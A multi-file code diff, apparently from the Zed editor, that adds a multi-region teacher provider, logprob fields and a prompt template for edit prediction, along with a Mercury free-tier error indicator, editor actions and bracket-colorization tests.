+ | PredictionProvider::TeacherMultiRegionNonBatching(_) => {
+ TeacherMultiRegionPrompt::parse(example, &actual_output)?
+ }
+ _ => TeacherPrompt::parse(example, &actual_output)?,
+ };
let prediction = ExamplePrediction {
actual_patch: Some(actual_patch),
@@ -495,10 +561,23 @@ async fn predict_openai(
actual_cursor,
error: None,
provider: if batched {
- PredictionProvider::Teacher(backend)
+ match example.prompt.as_ref().map(|prompt| prompt.provider) {
+ Some(PredictionProvider::TeacherMultiRegion(_)) => {
+ PredictionProvider::TeacherMultiRegion(backend)
+ }
+ _ => PredictionProvider::Teacher(backend),
+ }
} else {
- PredictionProvider::TeacherNonBatching(backend)
+ match example.prompt.as_ref().map(|prompt| prompt.provider) {
+ Some(PredictionProvider::TeacherMultiRegion(_))
+ | Some(PredictionProvider::TeacherMultiRegionNonBatching(_)) => {
+ PredictionProvider::TeacherMultiRegionNonBatching(backend)
+ }
+ _ => PredictionProvider::TeacherNonBatching(backend),
+ }
},
+ cumulative_logprob: None,
+ avg_logprob: None,
};
example.predictions.push(prediction);
@@ -583,6 +662,8 @@ pub async fn predict_baseten(
actual_cursor,
error: None,
provider: PredictionProvider::Baseten(format),
+ cumulative_logprob: None,
+ avg_logprob: None,
};
example.predictions.push(prediction);
@@ -591,7 +672,8 @@ pub async fn predict_baseten(
pub async fn sync_batches(provider: Option<&PredictionProvider>) -> anyhow::Result<()> {
match provider {
- Some(PredictionProvider::Teacher(backend)) => match backend {
+ Some(PredictionProvider::Teacher(backend))
+ | Some(PredictionProvider::TeacherMultiRegion(backend)) => match backend {
TeacherBackend::Sonnet45 | TeacherBackend::Sonnet46 => {
let llm_client = ANTHROPIC_CLIENT.get_or_init(|| {
AnthropicClient::batch(&crate::paths::LLM_CACHE_DB)
@@ -0,0 +1,366 @@
+# Instructions
+
+You are an edit prediction assistant in a code editor. Your task is to predict the next edit to a given region of code surrounding the user's cursor.
+
+1. Analyze the edit history to understand what the programmer is trying to achieve
+2. Identify any incomplete refactoring or changes that need to be finished
+3. Make the remaining edits that a human programmer would logically make next (by rewriting a region of code near their cursor)
+
+## Focus on
+
+- Completing any partially-applied changes made
+- Ensuring consistency with the programming style and patterns already established
+- Making edits that maintain or improve code quality
+
+## Rules
+
+- **NEVER undo or revert the user's recent edits.** Examine the diff in the edit history carefully:
+ - If a line was removed (starts with `-`), do NOT restore that content—even if the code now appears incomplete or broken without it
+ - If a line was added (starts with `+`), do NOT delete or significantly modify it
+ - If code appears broken or incomplete after the user's edit, output `NO_EDITS` rather than "fixing" it by reverting
+ - Only add NEW content that extends the user's work forward; never restore what they removed
+ - **Key test**: if your prediction would make the code more similar to what it was BEFORE the user's edit, output `NO_EDITS` instead
+ - **Never assume a deletion was accidental.** Even if removing content breaks the code, breaks a pattern, or leaves text looking "incomplete", respect it. The user may be mid-rewrite. Do NOT "complete" partial text by restoring what was deleted.
+- Auto-generated code can be modified: Hunks marked with `// User accepted prediction:` contain code from a previous prediction the user accepted. Unlike user-typed content, these hunks CAN be edited, corrected, or replaced if it improves the code. The "never undo/revert" rule protects the user's *current typing intent*—auto-generated code doesn't carry this protection
+- Do not just mechanically apply patterns - reason about what changes make sense given the context and the programmer's apparent goals.
+- Do not just fix syntax errors - look for the broader refactoring pattern and apply it systematically throughout the code.
+- Keep existing formatting unless it's absolutely necessary
+- When edit history and surrounding code suggest different edits, prioritize the most recent edits in the history as they best reflect current intent.
+- Treat partial text at or near the cursor as the beginning of something the user is actively typing. Complete the code the user appears to be creating based on context.
+- When completing partial code, prefer predictions that save meaningful keystrokes, even if this requires making educated guesses about the user's intent.
+- For code, it's better to make a substantive prediction that might be rejected than to make a minimal prediction that saves only a few keystrokes.
+- When the user is editing prose or documentation (e.g. Markdown, comments, plain text), predict conservatively. Complete the current fragment or sentence, but do not generate additional lines of free-form content since prose is less constrained than code and more prone to incorrect continuations.
+
+# Input Format
+
+You will be provided with:
+1. The user's *edit history*, in chronological order. Use this to infer the user's trajectory and predict the next most logical edit.
+ - Hunks preceded by `// User accepted prediction:` indicate code that was auto-generated by a previous prediction and accepted by the user. These are treated differently than user-typed edits (see Rules).
+2. A set of *related excerpts* from the user's codebase. Some of these may be needed for correctly predicting the next edit.
+ - `…` may appear within a related file to indicate that some code has been skipped.
+3. An excerpt from the user's *current file*.
+ - The excerpt contains numbered *marker* tags (`<|marker_1|>`, `<|marker_2|>`, etc.) placed at block boundaries throughout the code. These markers divide the excerpt into spans that you can target for editing.
+ - Code that appears before the first marker or after the last marker is read-only context and cannot be edited.
+ - The `<|user_cursor|>` tag marks the user's current cursor position, as it stands after the last edit in the history.
+
+# Output Format
+
+- Briefly explain the user's current intent based on the edit history and their current cursor location.
+- Output a markdown codeblock containing your predicted edit as a **marker-bounded span**:
+ - The codeblock must **start** with a marker tag (e.g. `<|marker_2|>`) and **end** with a marker tag (e.g. `<|marker_4|>`).
+ - The content between these two markers is the full replacement for that span in the original file.
+ - Choose the **narrowest** pair of markers that fully contains your predicted edits, to minimize unnecessary output.
+ - Reproduce any unchanged lines within the chosen span faithfully — do not omit or alter them.
+ - Do not include any intermediate marker tags in your output — only the start and end markers.
+- If no edit is needed (the code is already complete and correct, or there is no clear next edit to make), output a codeblock containing only `NO_EDITS`:
+ `````
+ NO_EDITS
+ `````
+- If there is a specific place in the predicted output where the user is likely to edit next, indicate it using the `<|user_cursor|>` tag.
+
+## Example 1
+
+There is code missing at the cursor location. The related excerpts includes the definition of a relevant type. You should fill in the missing code.
+
+### Related Excerpts
+
+`````
+struct Product {
+ name: String,
+ price: u32,
+}
+`````
+
+### User Edit History
+
+`````
+--- a/src/calculate.rs
++++ b/src/calculate.rs
+@@ -100,6 +100,7 @@
+ fn calculate_total(products: &[Product]) -> u32 {
+ let mut total = 0;
+ for product in products {
++ total += ;
+ }
+ total
+ }
+`````
+
+### Current File
+
+`````src/calculate.rs
+fn calculate_total(products: &[Product]) -> u32 {
+<|marker_1|>
+ let mut total = 0;
+ for product in products {
+ total += <|user_cursor|>;
+ }
+ total
+<|marker_2|>
+}
+`````
+
+### Output
+
+The user is computing a sum based on a list of products. The only numeric field on `Product` is `price`, so they must intend to sum the prices.
+
+`````
+<|marker_1|>
+ let mut total = 0;
+ for product in products {
+ total += product.price;
+ }
+ total
+<|marker_2|>
+`````
+
+## Example 2
+
+The user appears to be in the process of typing an eprintln call. Rather than fixing the spelling issue by deleting the newly-inserted content, you must continue the user's trajectory. It's not clear what data they intend to print. You should fill in as much code as is obviously intended, and position the cursor so that the user can fill in the rest.
+
+### User Edit History
+
+`````
+--- a/src/modal.rs
++++ b/src/modal.rs
+@@ -100,4 +100,4 @@
+ fn handle_close_button_click(modal_state: &mut ModalState, evt: &Event) {
+ modal_state.close();
+- modal_state.dismiss();
++ eprmodal_state.dismiss();
+ }
+`````
+
+### Current File
+
+`````src/modal.rs
+<|marker_1|>
+// handle the close button click
+fn handle_close_button_click(modal_state: &mut ModalState, evt: &Event) {
+<|marker_2|>
+ modal_state.close();
+ epr<|user_cursor|>modal_state.dismiss();
+}
+<|marker_3|>
+`````
+
+### Output
+
+The user is clearly starting to type `eprintln!()`, however, what they intend to print is not obvious. I should fill in the print call and string literal, with the cursor positioned inside the string literal so the user can print whatever they want.
+
+`````
+<|marker_2|>
+ modal_state.close();
+ eprintln!("<|user_cursor|>");
+ modal_state.dismiss();
+}
+<|marker_3|>
+`````
+
+## Example 3
+
+Here, the user is adding a function. There's no way to tell for sure what the function's name will be. In this situation, you should make a reasonable guess at the function's name and signature, and place the user's cursor in the function body. This way, if you guess correctly, it will save the user a meaningful number of keystrokes, and the file will be left in a coherent state.
+
+### User Edit History
+
+`````
+--- a/src/modal.rs
++++ b/src/modal.rs
+@@ -100,4 +100,4 @@
+ fn handle_close_button_click(modal_state: &mut ModalState, evt: &Event) {
+ modal_state.close();
+ modal_state.dismiss();
+ }
++
++fn
+
+ fn handle_keystroke(modal_state: &mut ModalState, evt: &Event) {
+`````
+
+### Current File
+
+`````src/modal.rs
+// handle the close button click
+fn handle_close_button_click(modal_state: &mut ModalState, evt: &Event) {
+ modal_state.close();
+<|marker_1|>
+ modal_state.dismiss();
+}
+
+fn<|user_cursor|>
+
+<|marker_2|>
+fn handle_keystroke(modal_state: &mut ModalState, evt: &Event) {
+ modal_state.begin_edit();
+<|marker_3|>
+`````
+
+### Output
+
+The user is adding a new function. The existing functions I see are `handle_close_button_click` and `handle_keystroke`, which have similar signatures. One possible function they might be adding is `handle_submit`.
+
+`````
+<|marker_1|>
+ modal_state.dismiss();
+}
+
+fn handle_submit(modal_state: &mut ModalState, evt: &Event) {
+ <|user_cursor|>
+}
+
+<|marker_2|>
+`````
+
+## Example 4
+
+The code is already complete and there is no clear next edit to make. You should output NO_EDITS.
+
+### User Edit History
+
+`````
+--- a/src/utils.rs
++++ b/src/utils.rs
+@@ -10,7 +10,7 @@
+ fn add(a: i32, b: i32) -> i32 {
+- a - b
++ a + b
+ }
+`````
+
+### Current File
+
+`````src/utils.rs
+<|marker_1|>
+fn add(a: i32, b: i32) -> i32 {
+ a + b<|user_cursor|>
+}
+<|marker_2|>
+`````
+
+### Output
+
+The user just fixed a bug in the `add` function, changing subtraction to addition. The code is now correct and complete. There is no clear next edit to make.
+
+`````
+NO_EDITS
+`````
+
+## Example 5
+
+The user just deleted code, leaving behind what looks incomplete. You must NOT "complete" it by restoring deleted content—that would undo their edit. Output NO_EDITS. **This is the correct response even though the code appears broken.**
+
+### User Edit History
+
+`````
+--- a/config.nix
++++ b/config.nix
+@@ -10,7 +10,7 @@
+ # /etc/modular/crashdb needs to be mutable
+- ln -s /tmp/crashdb $out/etc/modular/crashdb
++ ln -s /tmp/cr $out/etc/modular/crashdb
+ '';
+`````
+
+### Current File
+
+`````config.nix
+<|marker_1|>
+ # /etc/modular/crashdb needs to be mutable
+ ln -s /tmp/cr<|user_cursor|> $out/etc/modular/crashdb
+ '';
+<|marker_2|>
+`````
+
+### Output
+
+The user deleted `ashdb` from `/tmp/crashdb`, leaving `/tmp/cr`. Although this looks like incomplete text that I could "complete", doing so would restore deleted content. The user intentionally removed that text—I must not undo their deletion.
+
+`````
+NO_EDITS
+`````
+
+## Example 6
+
+The user accepted a prediction for a function, then started renaming it. The original arguments were auto-generated (marked with `// User accepted prediction:`), so they CAN be updated to match the new function name. This is NOT reverting user input—it's improving auto-generated scaffolding.
+
+### User Edit History
+
+`````
+--- a/math_utils.py
++++ b/math_utils.py
+@@ -3,3 +3,5 @@
+ def calculate_rectangle_area(width, height):
+ return width * height
+
+
++de
+
+// User accepted prediction:
+--- a/math_utils.py
++++ b/math_utils.py
+@@ -3,5 +3,7 @@
+ def calculate_rectangle_area(width, height):
+ return width * height
+
+-de
++def calculate_rectangle_perimeter(width, height):
++
+
+--- a/math_utils.py
++++ b/math_utils.py
+@@ -5,5 +5,5 @@
+ return width * height
+
+-def calculate_rectangle_perimeter(width, height):
++def calculate_sq_perimeter(width, height):
+
+`````
+
+### Current File
+
+`````math_utils.py
+<|marker_1|>
+def calculate_rectangle_area(width, height):
+ return width * height
+
+<|marker_2|>
+def calculate_sq<|user_cursor|>_perimeter(width, height):
+
+<|marker_3|>
+`````
+
+### Output
+
+The user accepted a prediction for `calculate_rectangle_perimeter(width, height)`, then started renaming `rectangle` to `square`. Since squares have equal sides, the arguments should change from `(width, height)` to `(side)`. The arguments were auto-generated (from an accepted prediction), so modifying them is appropriate.
+
+`````
+<|marker_2|>
+def calculate_square_perimeter(side):
+ <|user_cursor|>
+<|marker_3|>
+`````
+
+
+
+# Your task:
+
+# 1. User Edit History
+
+`````
+{{edit_history}}
+`````
+
+# 2. Related excerpts
+
+{{context}}
+
+# 3. Current File
+
+{{cursor_excerpt}}
+
+
+
+
+-----
+
+Based on the edit history and context above, predict the user's next edit within the marker-bounded spans.
@@ -10,7 +10,7 @@ use crate::{
BatchProvider, PredictionProvider,
anthropic_client::AnthropicClient,
example::{ActualCursor, Example, ExamplePrediction},
- format_prompt::{TeacherPrompt, extract_last_codeblock},
+ format_prompt::TeacherPrompt,
metrics::count_patch_token_changes,
openai_client::OpenAiClient,
parse_output::run_parse_output,
@@ -227,10 +227,7 @@ pub fn needs_repair(example: &Example, confidence_threshold: u8) -> bool {
/// Handles the `KEEP_PREVIOUS` sentinel by copying the teacher's prediction,
/// and delegates normal output to `TeacherPrompt::parse`.
pub fn parse(example: &Example, actual_output: &str) -> Result<(String, Option<ActualCursor>)> {
- let last_codeblock =
- extract_last_codeblock(actual_output).unwrap_or_else(|| actual_output.to_string());
-
- if last_codeblock.contains(KEEP_PREVIOUS) {
+ if actual_output.contains(KEEP_PREVIOUS) {
let original = example
.predictions
.first()
@@ -426,6 +423,8 @@ pub async fn run_repair(
actual_cursor,
error: err,
provider: PredictionProvider::Repair,
+ cumulative_logprob: None,
+ avg_logprob: None,
});
Ok(())
@@ -454,3 +453,71 @@ pub async fn sync_batches(args: &RepairArgs) -> Result<()> {
Ok(())
}
+
+#[cfg(test)]
+mod tests {
+ use super::*;
+ use crate::{PredictionProvider, TeacherBackend};
+ use edit_prediction::example_spec::ExampleSpec;
+ use std::{path::Path, sync::Arc};
+
+ fn example_with_previous_prediction() -> Example {
+ Example {
+ spec: ExampleSpec {
+ name: "example".to_string(),
+ repository_url: "https://github.com/zed-industries/zed.git".to_string(),
+ revision: "HEAD".to_string(),
+ tags: Vec::new(),
+ reasoning: None,
+ uncommitted_diff: String::new(),
+ cursor_path: Arc::from(Path::new("src/main.rs")),
+ cursor_position: "0:0".to_string(),
+ edit_history: String::new(),
+ expected_patches: Vec::new(),
+ rejected_patch: None,
+ telemetry: None,
+ human_feedback: Vec::new(),
+ rating: None,
+ },
+ prompt_inputs: None,
+ prompt: None,
+ predictions: vec![ExamplePrediction {
+ actual_patch: Some("previous patch".to_string()),
+ actual_output: String::new(),
+ actual_cursor: Some(ActualCursor {
+ path: "src/main.rs".to_string(),
+ row: 1,
+ column: 2,
+ offset: 3,
+ editable_region_offset: Some(4),
+ }),
+ error: None,
+ provider: PredictionProvider::Teacher(TeacherBackend::Sonnet45),
+ cumulative_logprob: None,
+ avg_logprob: None,
+ }],
+ score: Vec::new(),
+ qa: Vec::new(),
+ zed_version: None,
+ state: None,
+ }
+ }
+
+ #[test]
+ fn test_parse_keeps_previous_when_sentinel_appears_outside_last_codeblock() {
+ let example = example_with_previous_prediction();
+ let actual_output = indoc::indoc! {"
+ After reviewing the feedback, the previous prediction is still correct.
+ Use `KEEP_PREVIOUS`.
+
+ ```
+ unrelated trailing code block
+ ```
+ "};
+
+ let (patch, cursor) = parse(&example, actual_output).unwrap();
+
+ assert_eq!(patch, "previous patch");
+ assert_eq!(cursor.unwrap().offset, 3);
+ }
+}
@@ -78,6 +78,8 @@ pub async fn run_scoring(
has_isolated_whitespace_changes: false,
inserted_tokens: 0,
deleted_tokens: 0,
+ cumulative_logprob: None,
+ avg_logprob: None,
};
let cursor_path = example.spec.cursor_path.as_ref();
@@ -189,6 +191,8 @@ pub async fn run_scoring(
has_isolated_whitespace_changes,
inserted_tokens: token_changes.inserted_tokens,
deleted_tokens: token_changes.deleted_tokens,
+ cumulative_logprob: prediction.cumulative_logprob,
+ avg_logprob: prediction.avg_logprob,
});
}
@@ -1028,6 +1028,7 @@ fn assert_related_files_impl(
pretty_assertions::assert_eq!(actual, expected)
}
+#[track_caller]
fn assert_definitions(definitions: &[LocationLink], first_lines: &[&str], cx: &mut TestAppContext) {
let actual_first_lines = definitions
.iter()
@@ -174,7 +174,7 @@ pub fn register_fake_definition_server(
struct DefinitionIndex {
language: Arc<Language>,
definitions: HashMap<String, Vec<lsp::Location>>,
- type_annotations: HashMap<String, String>,
+ type_annotations_by_file: HashMap<Uri, HashMap<String, String>>,
files: HashMap<Uri, FileEntry>,
}
@@ -189,7 +189,7 @@ impl DefinitionIndex {
Self {
language,
definitions: HashMap::default(),
- type_annotations: HashMap::default(),
+ type_annotations_by_file: HashMap::default(),
files: HashMap::default(),
}
}
@@ -199,6 +199,7 @@ impl DefinitionIndex {
locations.retain(|loc| &loc.uri != uri);
!locations.is_empty()
});
+ self.type_annotations_by_file.remove(uri);
self.files.remove(uri);
}
@@ -243,11 +244,11 @@ impl DefinitionIndex {
.push(location);
}
- for (identifier_name, type_name) in extract_type_annotations(content) {
- self.type_annotations
- .entry(identifier_name)
- .or_insert(type_name);
- }
+ let type_annotations = extract_type_annotations(content)
+ .into_iter()
+ .collect::<HashMap<_, _>>();
+ self.type_annotations_by_file
+ .insert(uri.clone(), type_annotations);
self.files.insert(
uri,
@@ -279,7 +280,11 @@ impl DefinitionIndex {
let entry = self.files.get(&uri)?;
let name = word_at_position(&entry.contents, position)?;
- if let Some(type_name) = self.type_annotations.get(name) {
+ if let Some(type_name) = self
+ .type_annotations_by_file
+ .get(&uri)
+ .and_then(|annotations| annotations.get(name))
+ {
if let Some(locations) = self.definitions.get(type_name) {
return Some(lsp::GotoDefinitionResponse::Array(locations.clone()));
}
@@ -367,6 +372,20 @@ fn extract_base_type_name(type_str: &str) -> String {
return outer.to_string();
}
+ if let Some(call_start) = trimmed.find("::") {
+ let outer = &trimmed[..call_start];
+ if matches!(outer, "Arc" | "Box" | "Rc" | "Option" | "Vec" | "Cow") {
+ let rest = trimmed[call_start + 2..].trim_start();
+ if let Some(paren_start) = rest.find('(') {
+ let inner = &rest[paren_start + 1..];
+ let inner = inner.trim();
+ if !inner.is_empty() {
+ return extract_base_type_name(inner);
+ }
+ }
+ }
+ }
+
trimmed
.split(|c: char| !c.is_alphanumeric() && c != '_')
.next()
@@ -359,10 +359,16 @@ impl Render for EditPredictionButton {
}
EditPredictionProvider::Mercury => {
ep_icon = if enabled { icons.base } else { icons.disabled };
+ let mercury_has_error =
+ edit_prediction::EditPredictionStore::try_global(cx).is_some_and(
+ |ep_store| ep_store.read(cx).mercury_has_payment_required_error(),
+ );
missing_token = edit_prediction::EditPredictionStore::try_global(cx)
.is_some_and(|ep_store| !ep_store.read(cx).has_mercury_api_token(cx));
tooltip_meta = if missing_token {
"Missing API key for Mercury"
+ } else if mercury_has_error {
+ "Mercury free tier limit reached"
} else {
"Powered by Mercury"
};
@@ -373,7 +379,7 @@ impl Render for EditPredictionButton {
}
};
- if edit_prediction::should_show_upsell_modal() {
+ if edit_prediction::should_show_upsell_modal(cx) {
let tooltip_meta = if self.user_store.read(cx).current_user().is_some() {
"Choose a Plan"
} else {
@@ -414,7 +420,12 @@ impl Render for EditPredictionButton {
let show_editor_predictions = self.editor_show_predictions;
let user = self.user_store.read(cx).current_user();
- let indicator_color = if missing_token {
+ let mercury_has_error = matches!(provider, EditPredictionProvider::Mercury)
+ && edit_prediction::EditPredictionStore::try_global(cx).is_some_and(
+ |ep_store| ep_store.read(cx).mercury_has_payment_required_error(),
+ );
+
+ let indicator_color = if missing_token || mercury_has_error {
Some(Color::Error)
} else if enabled && (!show_editor_predictions || over_limit) {
Some(if over_limit {
@@ -1096,96 +1107,116 @@ impl EditPredictionButton {
},
)
.separator();
- } else if let Some(usage) = self
- .edit_prediction_provider
- .as_ref()
- .and_then(|provider| provider.usage(cx))
- {
- menu = menu.header("Usage");
- menu = menu
- .custom_entry(
- move |_window, cx| {
- let used_percentage = match usage.limit {
- UsageLimit::Limited(limit) => {
- Some((usage.amount as f32 / limit as f32) * 100.)
- }
- UsageLimit::Unlimited => None,
- };
+ } else {
+ let mercury_payment_required = matches!(provider, EditPredictionProvider::Mercury)
+ && edit_prediction::EditPredictionStore::try_global(cx).is_some_and(
+ |ep_store| ep_store.read(cx).mercury_has_payment_required_error(),
+ );
+
+ if mercury_payment_required {
+ menu = menu
+ .header("Mercury")
+ .item(ContextMenuEntry::new("Free tier limit reached").disabled(true))
+ .item(
+ ContextMenuEntry::new(
+ "Upgrade to a paid plan to continue using the service",
+ )
+ .disabled(true),
+ )
+ .separator();
+ }
+
+ if let Some(usage) = self
+ .edit_prediction_provider
+ .as_ref()
+ .and_then(|provider| provider.usage(cx))
+ {
+ menu = menu.header("Usage");
+ menu = menu
+ .custom_entry(
+ move |_window, cx| {
+ let used_percentage = match usage.limit {
+ UsageLimit::Limited(limit) => {
+ Some((usage.amount as f32 / limit as f32) * 100.)
+ }
+ UsageLimit::Unlimited => None,
+ };
- h_flex()
- .flex_1()
- .gap_1p5()
- .children(
- used_percentage.map(|percent| {
+ h_flex()
+ .flex_1()
+ .gap_1p5()
+ .children(used_percentage.map(|percent| {
ProgressBar::new("usage", percent, 100., cx)
- }),
- )
- .child(
- Label::new(match usage.limit {
- UsageLimit::Limited(limit) => {
- format!("{} / {limit}", usage.amount)
- }
- UsageLimit::Unlimited => format!("{} / ∞", usage.amount),
- })
+ }))
+ .child(
+ Label::new(match usage.limit {
+ UsageLimit::Limited(limit) => {
+ format!("{} / {limit}", usage.amount)
+ }
+ UsageLimit::Unlimited => {
+ format!("{} / ∞", usage.amount)
+ }
+ })
+ .size(LabelSize::Small)
+ .color(Color::Muted),
+ )
+ .into_any_element()
+ },
+ move |_, cx| cx.open_url(&zed_urls::account_url(cx)),
+ )
+ .when(usage.over_limit(), |menu| -> ContextMenu {
+ menu.entry("Subscribe to increase your limit", None, |_window, cx| {
+ telemetry::event!(
+ "Edit Prediction Menu Action",
+ action = "upsell_clicked",
+ reason = "usage_limit",
+ );
+ cx.open_url(&zed_urls::account_url(cx))
+ })
+ })
+ .separator();
+ } else if self.user_store.read(cx).account_too_young() {
+ menu = menu
+ .custom_entry(
+ |_window, _cx| {
+ Label::new("Your GitHub account is less than 30 days old.")
.size(LabelSize::Small)
- .color(Color::Muted),
- )
- .into_any_element()
- },
- move |_, cx| cx.open_url(&zed_urls::account_url(cx)),
- )
- .when(usage.over_limit(), |menu| -> ContextMenu {
- menu.entry("Subscribe to increase your limit", None, |_window, cx| {
+ .color(Color::Warning)
+ .into_any_element()
+ },
+ |_window, cx| cx.open_url(&zed_urls::account_url(cx)),
+ )
+ .entry("Upgrade to Zed Pro or contact us.", None, |_window, cx| {
telemetry::event!(
"Edit Prediction Menu Action",
action = "upsell_clicked",
- reason = "usage_limit",
+ reason = "account_age",
);
cx.open_url(&zed_urls::account_url(cx))
})
- })
- .separator();
- } else if self.user_store.read(cx).account_too_young() {
- menu = menu
- .custom_entry(
- |_window, _cx| {
- Label::new("Your GitHub account is less than 30 days old.")
- .size(LabelSize::Small)
- .color(Color::Warning)
- .into_any_element()
- },
- |_window, cx| cx.open_url(&zed_urls::account_url(cx)),
- )
- .entry("Upgrade to Zed Pro or contact us.", None, |_window, cx| {
- telemetry::event!(
- "Edit Prediction Menu Action",
- action = "upsell_clicked",
- reason = "account_age",
- );
- cx.open_url(&zed_urls::account_url(cx))
- })
- .separator();
- } else if self.user_store.read(cx).has_overdue_invoices() {
- menu = menu
- .custom_entry(
- |_window, _cx| {
- Label::new("You have an outstanding invoice")
- .size(LabelSize::Small)
- .color(Color::Warning)
- .into_any_element()
- },
- |_window, cx| {
- cx.open_url(&zed_urls::account_url(cx))
- },
- )
- .entry(
- "Check your payment status or contact us at billing-support@zed.dev to continue using this feature.",
- None,
- |_window, cx| {
- cx.open_url(&zed_urls::account_url(cx))
- },
- )
- .separator();
+ .separator();
+ } else if self.user_store.read(cx).has_overdue_invoices() {
+ menu = menu
+ .custom_entry(
+ |_window, _cx| {
+ Label::new("You have an outstanding invoice")
+ .size(LabelSize::Small)
+ .color(Color::Warning)
+ .into_any_element()
+ },
+ |_window, cx| {
+ cx.open_url(&zed_urls::account_url(cx))
+ },
+ )
+ .entry(
+ "Check your payment status or contact us at billing-support@zed.dev to continue using this feature.",
+ None,
+ |_window, cx| {
+ cx.open_url(&zed_urls::account_url(cx))
+ },
+ )
+ .separator();
+ }
}
if !needs_sign_in {
@@ -13,7 +13,7 @@ use project::{
};
use settings::Settings as _;
use std::rc::Rc;
-use std::{fmt::Write, sync::Arc, time::Duration};
+use std::{fmt::Write, sync::Arc};
use theme::ThemeSettings;
use ui::{
ContextMenu, DropdownMenu, KeyBinding, List, ListItem, ListItemSpacing, PopoverMenuHandle,
@@ -765,9 +765,7 @@ impl RatePredictionsModal {
.gap_1()
.child(
Button::new("bad", "Bad Prediction")
- .icon(IconName::ThumbsDown)
- .icon_size(IconSize::Small)
- .icon_position(IconPosition::Start)
+ .start_icon(Icon::new(IconName::ThumbsDown).size(IconSize::Small))
.disabled(rated || feedback_empty)
.when(feedback_empty, |this| {
this.tooltip(Tooltip::text(
@@ -791,9 +789,7 @@ impl RatePredictionsModal {
)
.child(
Button::new("good", "Good Prediction")
- .icon(IconName::ThumbsUp)
- .icon_size(IconSize::Small)
- .icon_position(IconPosition::Start)
+ .start_icon(Icon::new(IconName::ThumbsUp).size(IconSize::Small))
.disabled(rated)
.key_binding(KeyBinding::for_action_in(
&ThumbsUpActivePrediction,
@@ -854,30 +850,18 @@ impl RatePredictionsModal {
.gap_3()
.child(Icon::new(icon_name).color(icon_color).size(IconSize::Small))
.child(
- v_flex()
- .child(
- h_flex()
- .gap_1()
- .child(Label::new(file_name).size(LabelSize::Small))
- .when_some(file_path, |this, p| {
- this.child(
- Label::new(p)
- .size(LabelSize::Small)
- .color(Color::Muted),
- )
- }),
- )
- .child(
- Label::new(format!(
- "{} ago, {:.2?}",
- format_time_ago(
- completion.response_received_at.elapsed()
- ),
- completion.latency()
- ))
- .color(Color::Muted)
- .size(LabelSize::XSmall),
- ),
+ v_flex().child(
+ h_flex()
+ .gap_1()
+ .child(Label::new(file_name).size(LabelSize::Small))
+ .when_some(file_path, |this, p| {
+ this.child(
+ Label::new(p)
+ .size(LabelSize::Small)
+ .color(Color::Muted),
+ )
+ }),
+ ),
),
)
.tooltip(Tooltip::text(tooltip_text))
@@ -981,23 +965,6 @@ impl Focusable for RatePredictionsModal {
impl ModalView for RatePredictionsModal {}
-fn format_time_ago(elapsed: Duration) -> String {
- let seconds = elapsed.as_secs();
- if seconds < 120 {
- "1 minute".to_string()
- } else if seconds < 3600 {
- format!("{} minutes", seconds / 60)
- } else if seconds < 7200 {
- "1 hour".to_string()
- } else if seconds < 86400 {
- format!("{} hours", seconds / 3600)
- } else if seconds < 172800 {
- "1 day".to_string()
- } else {
- format!("{} days", seconds / 86400)
- }
-}
-
struct FeedbackCompletionProvider;
impl FeedbackCompletionProvider {
@@ -568,6 +568,10 @@ actions!(
GoToParentModule,
/// Goes to the previous change in the file.
GoToPreviousChange,
+ /// Goes to the next symbol.
+ GoToNextSymbol,
+ /// Goes to the previous symbol.
+ GoToPreviousSymbol,
/// Goes to the next reference to the symbol under the cursor.
GoToNextReference,
/// Goes to the previous reference to the symbol under the cursor.
@@ -695,8 +699,6 @@ actions!(
Rename,
/// Restarts the language server for the current file.
RestartLanguageServer,
- /// Reveals the current file in the system file manager.
- RevealInFileManager,
/// Reverses the order of selected lines.
ReverseLines,
/// Reloads the file from disk.
@@ -879,6 +881,8 @@ actions!(
UnwrapSyntaxNode,
/// Wraps selections in tag specified by language.
WrapSelectionsInTag,
+ /// Aligns selections from different rows into the same column
+ AlignSelections,
]
);
@@ -392,6 +392,20 @@ where
&bracket_colors_markup(&mut cx),
"All markdown brackets should be colored based on their depth, again"
);
+
+ cx.set_state(indoc! {r#"ˇ('')('')
+
+((''))('')
+
+('')((''))"#});
+ cx.executor().advance_clock(Duration::from_millis(100));
+ cx.executor().run_until_parked();
+
+ assert_eq!(
+ "«1('')1»«1('')1»\n\n«1(«2('')2»)1»«1('')1»\n\n«1('')1»«1(«2('')2»)1»\n1 hsla(207.80, 16.20%, 69.19%, 1.00)\n2 hsla(29.00, 54.00%, 65.88%, 1.00)\n",
+ &bracket_colors_markup(&mut cx),
+ "Markdown quote pairs should not interfere with parenthesis pairing"
+ );
}
#[gpui::test]
@@ -1455,6 +1469,60 @@ mod foo «1{
);
}
+ #[gpui::test]
+ // reproduction of #47846
+ async fn test_bracket_colorization_with_folds(cx: &mut gpui::TestAppContext) {
+ init_test(cx, |language_settings| {
+ language_settings.defaults.colorize_brackets = Some(true);
+ });
+ let mut cx = EditorLspTestContext::new(
+ Arc::into_inner(rust_lang()).unwrap(),
+ lsp::ServerCapabilities::default(),
+ cx,
+ )
+ .await;
+
+ // Generate a large function body. When folded, this collapses
+ // to a single display line, making small_function visible on screen.
+ let mut big_body = String::new();
+ for i in 0..700 {
+ big_body.push_str(&format!(" let var_{i:04} = ({i});\n"));
+ }
+ let source = format!(
+ "ˇfn big_function() {{\n{big_body}}}\n\nfn small_function() {{\n let x = (1, (2, 3));\n}}\n"
+ );
+
+ cx.set_state(&source);
+ cx.executor().advance_clock(Duration::from_millis(100));
+ cx.executor().run_until_parked();
+
+ cx.update_editor(|editor, window, cx| {
+ editor.fold_ranges(
+ vec![Point::new(0, 0)..Point::new(701, 1)],
+ false,
+ window,
+ cx,
+ );
+ });
+ cx.executor().advance_clock(Duration::from_millis(100));
+ cx.executor().run_until_parked();
+
+ assert_eq!(
+ indoc! {r#"
+⋯1»
+
+fn small_function«1()1» «1{
+ let x = «2(1, «3(2, 3)3»)2»;
+}1»
+
+1 hsla(207.80, 16.20%, 69.19%, 1.00)
+2 hsla(29.00, 54.00%, 65.88%, 1.00)
+3 hsla(286.00, 51.00%, 75.25%, 1.00)
+"#,},
+ bracket_colors_markup(&mut cx),
+ );
+ }
+
fn separate_with_comment_lines(head: &str, tail: &str, comment_lines: usize) -> String {
let mut result = head.to_string();
result.push_str("\n");
@@ -2320,6 +2320,19 @@ impl DisplaySnapshot {
if !line_indent.is_line_blank()
&& line_indent.raw_len() <= start_line_indent.raw_len()
{
+ if self
+ .buffer_snapshot()
+ .language_scope_at(Point::new(row, 0))
+ .is_some_and(|scope| {
+ matches!(
+ scope.override_name(),
+ Some("string") | Some("comment") | Some("comment.inclusive")
+ )
